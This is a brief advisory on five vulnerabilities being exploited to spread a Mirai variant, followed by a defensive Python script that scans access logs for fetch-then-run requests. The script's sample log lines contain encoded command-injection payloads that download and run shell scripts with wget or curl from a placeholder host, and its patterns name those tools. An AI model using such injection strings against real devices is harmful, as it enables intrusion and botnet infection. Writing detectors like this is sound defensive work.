Five known vulnerabilities are being actively exploited to serve a Mirai variant. These attacks are ongoing. Upon successful exploitation, the attackers try to download a malicious shell script, which carries out further infection behaviors such as downloading and executing Mirai variants and brute-forcers.
The vulnerabilities being exploited include:
1. VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability
2. CVE-2020-25506: D-Link DNS-320 Firewall Remote Command Execution Vulnerability
3. CVE-2021-27561 and CVE-2021-27562: Yealink Device Management Pre-Auth ‘root’ Level Remote Code Execution Vulnerability
4. CVE-2021-22502: Micro Focus Operation Bridge Reporter (OBR) Remote Code Execution
5. CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution Vulnerability
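
An added example, not part of the original advisory: a Python check that scans web access logs for the post-exploitation behavior described above, a request whose decoded parameters fetch a remote file and then run it with a shell. The log lines, paths, parameter names and addresses are constructed for illustration and are not indicators from these campaigns.

```python
import re
from urllib.parse import unquote_plus

# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A fetch tool followed by a remote location (URL or bare IPv4 address).
FETCH = re.compile(
    r'\b(?:wget|curl|tftp|ftpget)\b[^;|&]*?(?:https?://|\b\d{1,3}(?:\.\d{1,3}){3}\b)',
    re.I)
# Evidence that the fetched file is then executed.
RUN = re.compile(
    r'\|\s*(?:ba)?sh\b|\bchmod\s+\+?[0-7x]+|(?:^|[;|&\s])(?:ba)?sh\s+\S+', re.I)


def decode(target, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def find_dropper_requests(lines):
    """Return (client_ip, decoded_target) for fetch-then-run requests."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        target = decode(m.group("target"))
        fetch = FETCH.search(target)
        # The run step must come after the fetch step in the same request.
        if fetch and RUN.search(target, fetch.end()):
            hits.append((m.group("ip"), target))
    return hits


# Constructed sample lines: hypothetical paths, documentation-range addresses.
SAMPLE = [
    '198.51.100.7 - - [01/Mar/2021:10:00:00 +0000] "GET /cgi-bin/example.cgi?cmd=1%3Bwget%20http%3A%2F%2F192.0.2.10%2Fa.sh%20-O%20%2Ftmp%2Fa.sh%3Bsh%20%2Ftmp%2Fa.sh HTTP/1.1" 200 12',
    '203.0.113.5 - - [01/Mar/2021:10:00:01 +0000] "POST /api/example?name=x%2526%2526curl%2520-s%2520http%253A%252F%252F192.0.2.10%252Fb.sh%257Csh HTTP/1.1" 500 0',
    '198.51.100.8 - - [01/Mar/2021:10:00:02 +0000] "GET /docs/search?q=wget+manual HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Mar/2021:10:00:03 +0000] "GET /download?url=http%3A%2F%2Fexample.org%2Finstall.sh HTTP/1.1" 200 9',
]

if __name__ == "__main__":
    for ip, target in find_dropper_requests(SAMPLE):
        print(ip, target)
```

A hit shows that a fetch-then-run command reached the device's web interface, not that it succeeded; confirm by checking the device for outbound connections to the fetched host.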